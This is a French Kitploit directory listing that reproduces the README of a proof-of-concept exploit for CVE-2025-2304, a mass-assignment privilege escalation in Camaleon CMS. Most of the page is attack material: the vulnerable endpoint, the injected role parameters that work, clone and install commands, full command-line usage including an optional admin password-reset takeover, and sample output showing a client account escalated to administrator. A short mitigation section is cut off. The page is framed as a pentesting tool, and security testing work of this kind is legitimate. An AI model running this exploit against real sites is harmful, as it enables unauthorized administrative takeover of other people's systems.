Skip to content
KitploitKITPLOIT
OutilsExploitsBlog
Log in
Soumettre
OutilsExploitsBlog
Soumettre

Outils de Hacking, PenTest et Cybersécurité pour votre Arsenal de Sécurité !

Kitploit est un répertoire d'outils de hacking, de cybersécurité et de pentesting. Découvrez les dernières mises à jour des projets pour trouver des vulnérabilités, analyser des systèmes, automatiser les tests et renforcer votre sécurité.

··Flux·Contact·Confidentialité·© 2026 Kitploit

Répertoire d'outils

Catégories

Voir toutes les catégories
Loading categories
Outils/GitHubGitHub/d3vn0mi/cve-2025-2304-poc
Escalade de PrivilègesGénération de PayloadsAnalyse des VulnérabilitésExploitationExploitation d'Applications WebTests d'IntrusionApprentissage et Éducation
GitHubd3vn0mi/cve-2025-2304-poc

CVE-2025-2304-POC

Preuve de concept pour CVE-2025-2304 — escalade de privilèges critique (CVSS 9.4) par assignation en masse dans Camaleon CMS.

Voir le dépôt
1034il y a 5 moisPas encore vérifié

Populaires

Voir tout →

Découvrez les outils les plus utilisés par notre communauté.

Explorer tous les outils

Parcourez notre collection d'outils

Voir tous les outils →
Partager

CVE-2025-2304 PoC - Élévation de privilèges dans Camaleon CMS

CVE CVSS Python License

A Proof of Concept (PoC) exploit for CVE-2025-2304, a critical mass assignment vulnerability in Camaleon CMS that allows privilege escalation from low-privileged users to administrators.

    ██████╗ ██████╗ ██╗   ██╗███╗   ██╗ ██████╗ ███╗   ███╗██╗
    ██╔══██╗╚════██╗██║   ██║████╗  ██║██╔═████╗████╗ ████║██║
    ██║  ██║ █████╔╝██║   ██║██╔██╗ ██║██║██╔██║██╔████╔██║██║
    ██║  ██║ ╚═══██╗╚██╗ ██╔╝██║╚██╗██║████╔╝██║██║╚██╔╝██║██║
    ██████╔╝██████╔╝ ╚████╔╝ ██║ ╚████║╚██████╔╝██║ ╚═╝ ██║██║
    ╚═════╝ ╚═════╝   ╚═══╝  ╚═╝  ╚═══╝ ╚═════╝ ╚═╝     ╚═╝╚═╝

📋 Table des matières

  • Aperçu
  • Détails de la vulnérabilité
  • Fonctionnalités
  • Installation
  • Utilisation
  • Exemples
  • Versions affectées
  • Atténuation
  • Avertissement
  • Références
  • Auteur

🔍 Aperçu

CVE-2025-2304 est une vulnérabilité critique d'assignation de masse dans Camaleon CMS, présente dans la méthode updated_ajax du UsersController. Cette vulnérabilité provient de l'utilisation de la méthode dangereuse permit! dans Rails, qui permet à tous les paramètres de passer sans aucun filtrage.

Ce PoC démontre comment un utilisateur authentifié avec des privilèges faibles peut devenir administrateur en injectant des paramètres non autorisés lors des opérations de changement de mot de passe.

Score CVSS : 9.4 (Critique)

🐛 Détails de la vulnérabilité

Cause racine

Le code vulnérable utilise params.require(:user).permit! qui accepte tous les paramètres fournis par l'utilisateur sans validation :

def updated_ajax
  user_params = params.require(:user).permit!  # DANGEREUX !
  current_user.update(user_params)
end

Exploitation

Un attaquant peut injecter des paramètres supplémentaires comme user[role]=admin à côté des champs légitimes de changement de mot de passe, ce qui amène l'application à mettre à jour le rôle de l'utilisateur en administrateur.

Vecteur d'attaque :

  1. S'authentifier en tant qu'utilisateur à faibles privilèges (ex. rôle "client")
  2. Envoyer une requête POST malveillante vers /admin/users/{id}/updated_ajax
  3. Injecter le paramètre user[role]=admin
  4. Le rôle de l'utilisateur passe à administrateur

✨ Fonctionnalités

  • ✅ Test sécurisé : Préserve le mot de passe utilisateur pendant l'exploitation
  • ✅ Plusieurs charges utiles : Teste 7+ techniques d'injection différentes
  • ✅ Détection de version : Détecte automatiquement les versions CMS vulnérables
  • ✅ Option non destructive : Option --no-password-field pour le test le plus sûr
  • ✅ Support proxy : S'intègre avec Burp Suite/ZAP pour l'analyse manuelle
  • ✅ Mode verbeux : Sortie détaillée pour le débogage
  • ✅ Prise de contrôle admin : Attaque optionnelle de réinitialisation du mot de passe admin
  • ✅ Sortie colorée : Indicateurs visuels clairs pour succès/échec

📦 Installation

Prérequis

  • Python 3.7+
  • pip (gestionnaire de paquets Python)

Cloner le dépôt

git clone https://github.com/d3vhthnnni/cve-2025-2304-poc.git
cd cve-2025-2304-poc

Installer les dépendances

pip install -r requirements.txt

Ou installer manuellement :

pip install requests beautifulsoup4

🚀 Utilisation

Syntaxe de base

python3 cve-2025-2304-poc.py <target_url> -u <username> -p <password> [options]

Options en ligne de commande

arguments positionnels :
  target                URL cible (ex. http://target.com)

arguments requis :
  -u, --username        Nom d'utilisateur existant pour l'authentification
  -p, --password        Mot de passe utilisateur

arguments optionnels :
  -h, --help            Afficher l'aide et quitter
  -v, --verbose         Sortie verbeuse (afficher toutes les requêtes)
  --proxy PROXY         Proxy HTTP pour inspection du trafic (ex. http://127.0.0.1:8080)
  --no-password-field   Tester l'exploitation sans champs de mot de passe (le plus sûr)
  --skip-admin-test     Ignorer le test destructeur de réinitialisation du mot de passe admin

📚 Exemples

Test standard (Recommandé)

Testez avec des identifiants utilisateur existants tout en préservant le mot de passe :

python3 cve-2025-2304-poc.py http://target.com -u testuser -p Password123

Test le plus sûr (sans champs de mot de passe)

Testez sans inclure les champs de mot de passe dans la charge utile :

python3 cve-2025-2304-poc.py http://target.com -u testuser -p Password123 --no-password-field

Avec proxy Burp Suite

Acheminez le trafic via Burp Suite pour une inspection manuelle :

python3 cve-2025-2304-poc.py http://target.com -u testuser -p Password123 --proxy http://127.0.0.1:8080

Mode verbeux

Activez la sortie détaillée montrant toutes les requêtes et réponses :

python3 cve-2025-2304-poc.py http://target.com -u testuser -p Password123 -v

Ignorer les tests destructeurs

Testez uniquement l'élévation de privilèges, ignorez la réinitialisation du mot de passe admin :

python3 cve-2025-2304-poc.py http://target.com -u testuser -p Password123 --skip-admin-test

📊 Exemple de sortie

    ██████╗ ██████╗ ██╗   ██╗███╗   ██╗ ██████╗ ███╗   ███╗██╗
    ██╔══██╗╚════██╗██║   ██║████╗  ██║██╔═████╗████╗ ████║██║
    ██║  ██║ █████╔╝██║   ██║██╔██╗ ██║██║██╔██║██╔████╔██║██║
    ██║  ██║ ╚═══██╗╚██╗ ██╔╝██║╚██╗██║████╔╝██║██║╚██╔╝██║██║
    ██████╔╝██████╔╝ ╚████╔╝ ██║ ╚████║╚██████╔╝██║ ╚═╝ ██║██║
    ╚═════╝ ╚═════╝   ╚═══╝  ╚═╝  ╚═══╝ ╚═════╝ ╚═╝     ╚═╝╚═╝

============================================================
   CVE-2025-2304 - Camaleon CMS Privilege Escalation PoC
   Mass Assignment Vulnerability Tester
   Author: d3vn0mi | GitHub: github.com/d3vhthnnni
============================================================

[*] Cible : http://target.com
[*] Nom d'utilisateur : testuser
[*] Mot de passe : **********

[*] Connexion en tant que testuser...
[+] Connexion réussie

[*] Vérification de la version CMS...
[*] Version détectée : 2.9.0
[+] Version VULNÉRABLE (< 2.9.1)

============================================================
[*] Test de la vulnérabilité d'assignation de masse CVE-2025-2304
============================================================

[*] Utilisateur cible : testuser (ID : 7)
[*] Rôle actuel : Client (client)
[*] Le mot de passe restera inchangé

[1/7] Test : point de terminaison AJAX - user[role]
    ✗ Échec
[2/7] Test : point de terminaison AJAX - password[role]
============================================================
[+] EXPLOITATION RÉUSSIE !
============================================================
[+] Élévation de privilèges : Client → Administrateur
[+] Point de terminaison vulnérable : /admin/users/7/updated_ajax
[+] Charge utile fonctionnelle : {'password[role]': 'admin'}
[+] Mot de passe inchangé : l'utilisateur peut toujours se connecter normalement
[+] CVE-2025-2304 CONFIRMÉE !

[✓] VULNÉRABILITÉ CVE-2025-2304 CONFIRMÉE

🎯 Versions affectées

VersionStatut
< 2.9.1❌ Vulnérable
≥ 2.9.1✅ Corrigé

Particulièrement vulnérables :

  • Camaleon CMS 2.9.0
  • Camaleon CMS 2.8.x et versions antérieures

🛡️ Atténuation

Actions immédiates

  1. Mettre à jour vers la version 2.9.1 ou ultérieure
    gem update camaleon_cms
    
Télécharger l’outil